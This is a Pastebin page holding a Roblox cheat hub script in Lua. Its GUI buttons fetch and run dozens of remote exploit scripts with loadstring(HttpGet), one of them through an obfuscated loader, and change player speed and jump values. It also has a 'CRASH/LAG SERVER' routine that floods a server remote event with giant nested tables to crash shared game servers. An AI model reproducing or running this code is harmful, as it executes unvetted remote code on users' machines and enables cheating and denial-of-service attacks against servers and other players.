Advertisement
Enel_Scripts

Enel-scripts

Aug 24th, 2022
487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.97 KB | None | 0 0
  1. -- Made by: ruban#2077
  2.  
  3. -- Join his discord server: https://discord.gg/eG9m3vqz
  4.  
  5. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  6. local Window = Library.CreateLib("Enel-Private ", "BloodTheme")
  7.  
  8. --MAIN
  9. local Main = Window:NewTab("Main")
  10. local MainSection = Main:NewSection("Main")
  11.  
  12.  
  13. MainSection:NewButton("inf yeild", "Commands", function()
  14. loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
  15. end)
  16.  
  17.  
  18. MainSection:NewToggle("super human", "HeckerMEn", function(state)
  19. if state then
  20. game.Players.localPlayer.Character.Humanoid.WalkSpeed = 120
  21. game.Players.localPlayer.Character.Humanoid.JumpPower = 120
  22. else
  23. game.Players.localPlayer.Character.Humanoid.WalkSpeed = 16
  24. game.Players.localPlayer.Character.Humanoid.JumpPower = 50
  25. end
  26. end)
  27.  
  28. --LOCAL PLAYER
  29. local Player = Window:NewTab("Player")
  30. local PlayerSection = Player:NewSection("Player")
  31.  
  32. PlayerSection:NewSlider("speed power", "go to go fast", 500, 16, function(s) -- 500 (MaxValue) | 0 (MinValue)
  33. game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s
  34. end)
  35.  
  36. PlayerSection:NewSlider("jump power", "jumper", 350, 50, function(s) -- 500 (MaxValue) | 0 (MinValue)
  37. game.Players.LocalPlayer.Character.Humanoid.JumpPower = s
  38. end)
  39.  
  40. PlayerSection:NewToggle("slow", "ugh my my back hurts", function(state)
  41. if state then
  42. game.Players.localPlayer.Character.Humanoid.WalkSpeed = 9
  43. game.Players.localPlayer.Character.Humanoid.JumpPower = 35
  44. else
  45. game.Players.localPlayer.Character.Humanoid.WalkSpeed = 16
  46. game.Players.localPlayer.Character.Humanoid.JumpPower = 50
  47. end
  48. end)
  49.  
  50. --Scripts
  51. local Scripts = Window:NewTab("Scripts")
  52. local ScriptsSection = Scripts:NewSection("Scripts")
  53.  
  54. ScriptsSection:NewButton("Bedwars", "vape v4", function()
  55. loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua", true))()
  56. end)
  57.  
  58. ScriptsSection:NewButton("Blox fruit", "roblox blox furit sceript", function()
  59. loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/ATR",true))()
  60. end)
  61.  
  62. ScriptsSection:NewButton("murderer mystery ", "OP", function()
  63. getgenv().mainKey = "nil" local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https://api.eclipsehub.xyz/auth"c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
  64. end)
  65.  
  66. ScriptsSection:NewButton("da Hood", "gangster", function()
  67. loadstring(game:HttpGet('https://ekso.gq/raw/relases/zapped.lua'))()
  68. end)
  69.  
  70. ScriptsSection:NewButton("islands", "SKYWARS LOL", function()
  71. loadstring(game:HttpGet("https://system-exodus.com/scripts/Islands/Islands.lua", true))()
  72. end)
  73.  
  74. ScriptsSection:NewButton("Slap battle", "kill aura gui", function()
  75. loadstring(game:HttpGet("https://raw.githubusercontent.com/rblxscriptsnet/rblxhub/main/rblxhub.lua"))()
  76. end)
  77.  
  78. ScriptsSection:NewButton("anime fighter", "KJ hub", function()
  79. loadstring(game.HttpGet(game, "https://raw.githubusercontent.com/KiJinGaming/FreeScript/main/KJHub.lua"))();
  80. end)
  81.  
  82. ScriptsSection:NewButton("Raise a floppa", "Red GUI", function()
  83. --Script :
  84. _G.RedGUI = true
  85. _G.Theme = "Dark" -- Must disable or remove _G.RedGUI to use
  86. --Themes: Light, Dark, Mocha, Aqua and Jester
  87. _G.V3rmillion = true
  88. end)
  89.  
  90. ScriptsSection:NewButton("bot clash", "krakenz", function()
  91. loadstring(game:HttpGet("https://raw.githubusercontent.com/Krackenz/RobloxScripts/main/BotClashV2.lua",true))()
  92. end)
  93.  
  94. ScriptsSection:NewButton("ROBEAT", "AUTOPLAYER", function()
  95. loadstring(game:HttpGet("https://raw.githubusercontent.com/Introvert1337/RobloxReleases/main/Scripts/RoBeats/Autoplayer.lua"))()
  96. end)
  97.  
  98. ScriptsSection:NewButton("BEE SWARM SIM", "kocmoc", function()
  99. loadstring(game:HttpGet("https://raw.githubusercontent.com/not-weuz/Lua/main/kocmoc.lua"))()
  100. end)
  101.  
  102. ScriptsSection:NewButton("build a boat for treasure", "vynixius", function()
  103. loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Vynixius/main/Build%20A%20Boat%20For%20Treasure/Script.lua"))()loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Vynixius/main/Build%20A%20Boat%20For%20Treasure/Script.lua"))()
  104. end)
  105.  
  106. ScriptsSection:NewButton("weak peice", "xlostpexz, it kinda bad but ok ig", function()
  107. loadstring(game:HttpGet("https://raw.githubusercontent.com/xlostpexz/WeakPiece/main/WeakPiece.lua"))()
  108. end)
  109.  
  110. ScriptsSection:NewButton("grand pirate", "idk", function()
  111. loadstring(game:HttpGet("https://rawscripts.net/raw/loader_1038"))()
  112. end)
  113.  
  114. ScriptsSection:NewButton("king legacy ", "free version", function()
  115. loadstring(game:HttpGet"https://raw.githubusercontent.com/xDepressionx/Free-Script/main/KingLegacy.lua")()
  116. end)
  117.  
  118. ScriptsSection:NewButton("anime dimension", "bird hub", function()
  119. loadstring(game:HttpGet("https://raw.githubusercontent.com/TheWitch-BirdHub/BirdHubv0.1/main/load"))()
  120. end)
  121.  
  122. ScriptsSection:NewButton("demon fall", "idk", function()
  123. loadstring(game:HttpGet("https://raw.githubusercontent.com/LeadMarker/OpenSource/main/Demonfall.lua"))()
  124. end)
  125.  
  126. ScriptsSection:NewButton("big paint ball", "iNEXT", function()
  127. loadstring(game:HttpGet("https://raw.githubusercontent.com/radjahfromdiscord/iNEXT/main/source"))()
  128. end)
  129.  
  130. ScriptsSection:NewButton("clicker simulator", "idk", function()
  131. loadstring(game:HttpGet("https://raw.githubusercontent.com/Kederal/script.gg/main/loader.lua"))()
  132. end)
  133.  
  134. ScriptsSection:NewButton("aopg 1", "idk", function()
  135. loadstring(game:HttpGet("https://raw.githubusercontent.com/scriptpastebin/raw/main/32"))()
  136. end)
  137.  
  138. ScriptsSection:NewButton("aopg 2", "idk", function()
  139. loadstring(game:HttpGet("https://rawscripts.net/raw/Testing-A-0ne-Piece-Game-LeadMarkerAOPG-1595"))()
  140. end)
  141.  
  142. ScriptsSection:NewButton("elemental battleground", "V.G HUB", function()
  143. loadstring(game:HttpGet('https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub'))()
  144. end)
  145.  
  146. ScriptsSection:NewButton("Tds auto strat", "by money maker", function()
  147. local TDS = loadstring(game:HttpGet("https://raw.githubusercontent.com/banbuskox/dfhtyxvzexrxgfdzgzfdvfdz/main/ckmhjvskfkmsStratFun2", true))()
  148. TDS:Loadout("Scout", "Sniper", "nil", "nil", "nil")
  149. TDS:Map("Autumn Falling", true, "Survival")
  150. TDS:Mode('Normal')
  151. TDS:Place('Scout', -41.343967437744, 3.0023679733276, 0.6797342300415, 1, 0, 57)
  152. TDS:Upgrade(1, 1, 0, 56)
  153. TDS:Upgrade(1, 1, 0, 55)
  154. TDS:Place('Scout', -34.935607910156, 3.0024552345276, 2.8598260879517, 2, 0, 52)
  155. TDS:Upgrade(2, 2, 0, 50)
  156. TDS:Upgrade(2, 2, 0, 3)
  157. TDS:Upgrade(2, 4, 0, 4)
  158. TDS:Upgrade(1, 6, 0, 58)
  159. TDS:Place('Scout', -34.867561340332, 3.0048241615295, -0.2752161026001, 6, 0, 4)
  160. TDS:Place('Scout', -34.85572052002, 2.2458710670471, 6.0150465965271, 7, 0, 58)
  161. TDS:Place('Scout', -31.816738128662, 2.2458720207214, 5.0957360267639, 7, 0, 50)
  162. TDS:Place('Scout', -31.678031921387, 2.2224938869476, 8.0997333526611, 8, 0, 56)
  163. TDS:Upgrade(3, 8, 0, 53)
  164. TDS:Upgrade(3, 8, 0, 52)
  165. TDS:Upgrade(3, 9, 0, 57)
  166. TDS:Upgrade(5, 9, 0, 55)
  167. TDS:Upgrade(5, 9, 0, 55)
  168. TDS:Upgrade(4, 10, 0, 59)
  169. TDS:Upgrade(4, 10, 0, 58)
  170. TDS:Upgrade(6, 10, 0, 55)
  171. TDS:Upgrade(6, 10, 0, 54)
  172. TDS:Upgrade(4, 10, 0, 3)
  173. TDS:Place('Sniper', -21.369630813599, 6.1764059066772, 0.31809794902802, 11, 0, 47)
  174. TDS:Upgrade(7, 11, 0, 45)
  175. TDS:Upgrade(7, 11, 0, 3)
  176. TDS:Upgrade(5, 12, 0, 45)
  177. TDS:Upgrade(6, 12, 0, 3)
  178. TDS:Place('Sniper', -21.063768386841, 6.1793580055237, 3.4187164306641, 13, 0, 55)
  179. TDS:Upgrade(8, 13, 0, 53)
  180. TDS:Upgrade(8, 13, 0, 4)
  181. TDS:Place('Scout', -31.836868286133, 3.0020725727081, 3.043625831604, 14, 0, 57)
  182. TDS:Place('Scout', -31.789745330811, 3.0045719146729, 0.022478103637695, 14, 0, 50)
  183. TDS:Place('Scout', -34.945415496826, 3.0043683052063, -3.3602828979492, 14, 0, 46)
  184. TDS:Place('Scout', -31.817302703857, 3.0045719146729, -3.0682377815247, 14, 0, 43)
  185. TDS:Upgrade(7, 14, 0, 3)
  186. TDS:Upgrade(10, 15, 0, 54)
  187. TDS:Upgrade(12, 15, 0, 52)
  188. TDS:Upgrade(9, 15, 0, 51)
  189. TDS:Upgrade(8, 16, 0, 54)
  190. TDS:Place('Sniper', -19.040802001953, 6.1738600730896, -2.7078275680542, 17, 0, 47)
  191. TDS:Upgrade(13, 17, 0, 44)
  192. TDS:Upgrade(13, 17, 0, 43)
  193. TDS:Upgrade(13, 18, 0, 58)
  194. TDS:Upgrade(11, 18, 0, 52)
  195. TDS:Upgrade(9, 18, 0, 47)
  196. TDS:Upgrade(10, 18, 0, 44)
  197. TDS:Place('Sniper', -17.984052658081, 6.1767582893372, 1.5586576461792, 19, 0, 56)
  198. TDS:Place('Sniper', -17.990505218506, 6.1792306900024, 4.6238374710083, 19, 0, 51)
  199. TDS:Upgrade(15, 19, 0, 49)
  200. TDS:Upgrade(15, 19, 0, 48)
  201. TDS:Upgrade(14, 19, 0, 45)
  202. TDS:Upgrade(14, 19, 0, 34)
  203. TDS:Upgrade(2, 19, 0, 2)
  204. TDS:Place('Sniper', -14.898565292358, 6.1761355400085, 2.4734437465668, 20, 0, 45)
  205. TDS:Upgrade(16, 20, 0, 43)
  206. TDS:Upgrade(16, 20, 0, 3)
  207. TDS:Upgrade(9, 21, 0, 56)
  208. TDS:Skip(21, 0, 37)
  209. TDS:Upgrade(10, 21, 0, 3)
  210. TDS:Upgrade(12, 22, 0, 58)
  211. TDS:Upgrade(12, 22, 0, 57)
  212. TDS:Upgrade(11, 22, 0, 56)
  213. TDS:Upgrade(11, 22, 0, 55)
  214. TDS:Upgrade(14, 22, 0, 8)
  215. TDS:Upgrade(15, 22, 0, 3)
  216. TDS:Upgrade(16, 23, 0, 46)
  217. TDS:Upgrade(9, 23, 0, 23)
  218. TDS:Upgrade(10, 23, 0, 3)
  219. TDS:Upgrade(3, 24, 0, 4)
  220. TDS:Upgrade(1, 26, 0, 58)
  221. TDS:Upgrade(12, 26, 0, 55)
  222. TDS:Upgrade(11, 26, 0, 49)
  223. TDS:Upgrade(4, 26, 0, 3)
  224. TDS:Upgrade(7, 27, 0, 5)
  225. TDS:Upgrade(8, 28, 0, 20)
  226. TDS:Upgrade(13, 29, 0, 44)
  227. TDS:Upgrade(14, 30, 1, 18)
  228. TDS:Upgrade(5, 30, 1, 6)
  229. TDS:Upgrade(6, 30, 0, 51)
  230. TDS:Upgrade(15, 31, 1, 19)
  231. TDS:Upgrade(16, 31, 0, 41)
  232. TDS:Place('Scout', -22.914464950562, 3.0045721530914, -2.7904424667358, 31, 0, 31)
  233. TDS:Upgrade(17, 31, 0, 29)
  234. TDS:Upgrade(17, 31, 0, 28)
  235. TDS:Upgrade(17, 31, 0, 27)
  236. TDS:Upgrade(17, 31, 0, 19)
  237. TDS:Place('Scout', -0.69402933120728, 3.004864692688, 2.5758056640625, 31, 0, 1)
  238. TDS:Upgrade(18, 32, 0, 1)
  239. TDS:Upgrade(18, 32, 1, 19)
  240. TDS:Upgrade(18, 32, 1, 19)
  241. TDS:Upgrade(18, 32, 1, 18)
  242. TDS:Place('Scout', 2.6734616756439, 3.0048666000366, 2.6611852645874, 32, 1, 11)
  243. TDS:Upgrade(19, 32, 1, 9)
  244. TDS:Upgrade(19, 32, 1, 9)
  245. TDS:Upgrade(19, 32, 1, 8)
  246. TDS:Upgrade(19, 32, 1, 6)
  247. TDS:Sell(18, 32, 1, 2)
  248. TDS:Sell(19, 32, 1, 0)
  249. TDS:Place('Scout', -29.170017242432, 3.0045721530914, -6.2040448188782, 32, 0, 36)
  250. TDS:Upgrade(20, 32, 0, 35)
  251. TDS:Upgrade(20, 32, 0, 34)
  252. TDS:Upgrade(20, 32, 0, 33)
  253. TDS:Upgrade(20, 32, 0, 33)
  254. TDS:Place('Scout', -32.392528533936, 3.0045721530914, -6.4256181716919, 32, 0, 28)
  255. TDS:Upgrade(21, 32, 0, 27)
  256. TDS:Upgrade(21, 32, 0, 26)
  257. TDS:Upgrade(21, 32, 0, 25)
  258. TDS:Upgrade(21, 32, 0, 24)
  259. TDS:Place('Sniper', -47.423664093018, 5.3464403152466, 7.5510640144348, 32, 0, 12)
  260. TDS:Upgrade(22, 32, 0, 11)
  261. TDS:Upgrade(22, 32, 0, 11)
  262. TDS:Upgrade(22, 32, 0, 10)
  263. TDS:Upgrade(22, 33, 1, 9)
  264. TDS:Place('Scout', 25.751207351685, 3.0047087669373, 17.466114044189, 33, 0, 10)
  265. TDS:Upgrade(23, 33, 0, 10)
  266. TDS:Upgrade(23, 33, 0, 9)
  267. TDS:Upgrade(23, 33, 0, 9)
  268. TDS:Upgrade(23, 33, 0, 9)
  269. TDS:Place('Scout', 27.373392105103, 3.0049204826355, 27.048875808716, 33, 0, 7)
  270. TDS:Upgrade(24, 33, 0, 6)
  271. TDS:Upgrade(24, 33, 0, 6)
  272. TDS:Upgrade(24, 33, 0, 6)
  273. TDS:Upgrade(24, 33, 0, 6)
  274. TDS:Upgrade(24, 33, 0, 6)
  275. end)
  276.  
  277. ScriptsSection:NewButton("Youtube life", "RegularVynixu", function()
  278. loadstring(game:HttpGet("https://raw.githubusercontent.com/RegularVynixu/Scripts/main/YouTube%20Life/Auto%20Farm.lua"))()
  279. end)
  280.  
  281. ScriptsSection:NewButton("my Resaurant", "void_scripts", function()
  282. loadstring(game:HttpGet("http://void-scripts.com/Scripts/myRest.lua"))()
  283. end)
  284.  
  285.  
  286.  
  287. --OTHERS
  288.  
  289. local others = Window:NewTab("others")
  290. local OTHERSSection = others:NewSection("others")
  291.  
  292. OTHERSSection:NewButton("CRASH/LAG SERVER", "OOPS...", function()
  293. --// made my reestart
  294. --// fixed by daddy ewo
  295. while wait(0.6) do --// don't change it's the best
  296. game:GetService("NetworkClient"):SetOutgoingKBPSLimit(math.huge)
  297. local function getmaxvalue(val)
  298. local mainvalueifonetable = 499999
  299. if type(val) ~= "number" then
  300. return nil
  301. end
  302. local calculateperfectval = (mainvalueifonetable/(val+2))
  303. return calculateperfectval
  304. end
  305. local function bomb(tableincrease, tries)
  306. local maintable = {}
  307. local spammedtable = {}
  308. table.insert(spammedtable, {})
  309. z = spammedtable[1]
  310. for i = 1, tableincrease do
  311. local tableins = {}
  312. table.insert(z, tableins)
  313. z = tableins
  314. end
  315. local calculatemax = getmaxvalue(tableincrease)
  316. local maximum
  317. if calculatemax then
  318. maximum = calculatemax
  319. else
  320. maximum = 999999
  321. end
  322. for i = 1, maximum do
  323. table.insert(maintable, spammedtable)
  324. end
  325. for i = 1, tries do
  326. game.RobloxReplicatedStorage.SetPlayerBlockList:FireServer(maintable)
  327. end
  328. end
  329. bomb(250, 2) --// change values if client crashes
  330. end
  331. end)
  332.  
  333. --Credits
  334.  
  335. local others = Window:NewTab("Credits")
  336. local CreditsSection = others:NewSection("Credits GUI")
  337.  
  338. CreditsSection:NewLabel("Made by Ruban#2077")
  339.  
  340. CreditsSection:NewLabel("Co helper:Kendo/best friend")
  341.  
  342. CreditsSection:NewLabel("Tester:Me/Ruban#2077")
  343.  
  344. CreditsSection:NewLabel("helper(Daniel)")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement